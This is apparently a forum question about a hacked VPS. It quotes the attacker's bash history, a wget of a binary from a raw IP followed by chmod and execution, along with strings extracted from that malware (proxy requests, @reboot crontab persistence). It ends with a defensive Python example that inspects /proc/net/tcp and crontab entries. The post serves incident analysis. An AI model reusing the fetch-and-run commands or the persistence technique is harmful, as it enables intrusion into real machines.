We got hacked; someone got access to our VPS machine. There are no ssh logs, there are no auth logs. There is no actual trace of remote access (that I could find; I'm not a security expert, but I'm not a complete beginner either).
After a lot of digging we found that the root user has some new lines in /root/.bash_history, specifically these:
cd /var/lib/
wget http://88.198.27.53:1085/pklib
chmod +x pklib
./pklib
The pklib file is a binary. Running cat pklib returns a lot of gibberish and a couple of lines that resemble a manual HTTP request:
��,q��,q��,q���n��,q��,q��&o��,q��q��,q��,q��,q��,q��#q��CONNECT %s:%d HTTP/1.0
Host: %s:%d
200 OK%s%s%.2d/%.2d/%d %.2d:%.2d:%.2d%d%s%s%d%s%llu%s%s/?rbwb%d%s%llu%s%s%s/%s/proc/%i/exe/proc/self/cmdline%.4d-%.2d-%.2d %.2d:%.2d:%.2d%d%dhttp://%s%s%sGET %s HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Connection: close
/proc//proc/statbtime /proc/%s/stat%s (%[^)]/proc/%s/exe/dev/ptmx
exit
exit
/bin/sh/bin/bash/..//.///localhostUSERUnknownr/etc/version/etc/%s/etc/lsb-release/etc/redhat-release/proc/cpuinfomodel name,PATHHOME%s%s%s%s%llu%llu%llu%d%s%s%s%s%s%s%d%d%s%d%s%d%s%dcrontab -l 2>&1w/tmp/nctf.txt@reboot "%s"no crontab for crontab /tmp/nctf.txt 2>&1-m.Settings/tmp/.%srb+%Rand%-m "%s"E�2��^3�!���{16:%s;0:%llu:%s;%c%ll @�6%d%s%s%s%.2d/%.2d/%d %.2d:%.2d:%.2d%s--socket:[[0000]:/proc/proc/%s/fdfd//proc/net/tcp%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %X:%X %X:%X %X %d %d %d %512s
I tried running this script on a dummy machine (freshly created and empty), and the script just installs itself in /root/.Install/Host.out and adds a crontab entry to run the script on reboot.
The machine the binary was downloaded from does not exist anymore, probably destroyed after our machine got infected. Since the script does HTTP requests (I think), I tried, without success, to run a sniffer to try and catch the requests' content or at least the IPs it connects to. It connects to a lot of machines and tcpdump can't find anything useful (no HTTP requests).
Now I have two questions:
- How can I debug this binary file and find out what it does?
- How did the hacker get access to our machine?
My current goal is to find out how the access happened, what the script does and how to prevent such things from happening again.
Footnotes if anyone is interested in the mystery:
sshd_config blocks root login and password login. auth.log has a lot of login attempts, with several users and without a single success. Users like: root, d3ftup, web, admin, game, unknown, book, etc.
There are no other users created
The script did not create a new user and give access to it; running
sudo cat /etc/shadow | grep '^[^:]*:[^\*!]'
returns 2 users, root and myuser. root does not have ssh access, and myuser is a restricted user that we use to upload updates.
P.S.: I'm not sure if the title does justice to what I want, but it is the closest I could think of.
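An added example (not the poster's code) for the "which IPs does it connect to" question, which can be answered without a sniffer: the strings in the binary show it reads /proc/net/tcp and /proc/&lt;pid&gt;/fd, and those same two files let a defender list exactly which remote endpoints a given process holds open, and check crontab -l output for the @reboot persistence entry described above. The /proc/net/tcp rows, fd link targets and crontab text below are constructed samples; on a live host they come from reading /proc/net/tcp, os.readlink over /proc/&lt;pid&gt;/fd/*, and crontab -l.

```python
import re
import socket
import struct

# One row of /proc/net/tcp: "sl: local:port remote:port st tx:rx tr:when retrnsmt uid timeout inode ..."
# (the same layout the binary's embedded sscanf format string parses).
ROW_RE = re.compile(
    r"^\s*\d+:\s+([0-9A-F]{8}):([0-9A-F]{4})\s+([0-9A-F]{8}):([0-9A-F]{4})\s+([0-9A-F]{2})"
    r"\s+[0-9A-F]+:[0-9A-F]+\s+[0-9A-F]+:[0-9A-F]+\s+[0-9A-F]+\s+(\d+)\s+\d+\s+(\d+)", re.I)
STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "06": "TIME_WAIT", "0A": "LISTEN"}

def hex_to_ipv4(hex_addr):
    # The kernel prints IPv4 as a host-order 32-bit hex value; on little-endian x86 the octets are reversed.
    return socket.inet_ntoa(struct.pack("<L", int(hex_addr, 16)))

def parse_proc_net_tcp(text):
    """Decode /proc/net/tcp text into readable connection records."""
    out = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            lip, lport, rip, rport, st, uid, inode = m.groups()
            out.append({"local": f"{hex_to_ipv4(lip)}:{int(lport, 16)}",
                        "remote": f"{hex_to_ipv4(rip)}:{int(rport, 16)}",
                        "state": STATES.get(st.upper(), st), "uid": int(uid), "inode": int(inode)})
    return out

def socket_inodes(fd_link_targets):
    """Socket inodes from readlink() of /proc/<pid>/fd/* entries, which look like 'socket:[45678]'."""
    return {int(m.group(1)) for t in fd_link_targets for m in [re.fullmatch(r"socket:\[(\d+)\]", t)] if m}

def connections_of(proc_net_tcp_text, fd_link_targets):
    """Only the connections owned by one process: join its socket inodes against /proc/net/tcp."""
    inodes = socket_inodes(fd_link_targets)
    return [c for c in parse_proc_net_tcp(proc_net_tcp_text) if c["inode"] in inodes]

def reboot_entries(crontab_text):
    """@reboot lines in 'crontab -l' output (the persistence style described in the question)."""
    return [l.strip() for l in crontab_text.splitlines() if l.strip().startswith("@reboot")]

# Constructed sample input (not captured from the real incident); 88.198.27.53:1085 is the
# download address from the question, encoded the way /proc/net/tcp shows it (351BC658:043D).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   1: 0500000A:C350 351BC658:043D 01 00000000:00000000 00:00000000 00000000     0        0 45678 1 0000000000000000 20 4 30 10 -1
"""
SAMPLE_FD_LINKS = ["/dev/null", "/dev/null", "socket:[45678]", "/root/.Install/Host.out"]
SAMPLE_CRONTAB = '# m h dom mon dow command\n@reboot "/root/.Install/Host.out"\n'
```

On a real host, connections_of(open("/proc/net/tcp").read(), [os.readlink(p) for p in glob.glob(f"/proc/{pid}/fd/*")]) gives the process's live TCP endpoints as root; /proc/net/tcp6 uses the same row layout with 32-hex-digit addresses and is not handled here.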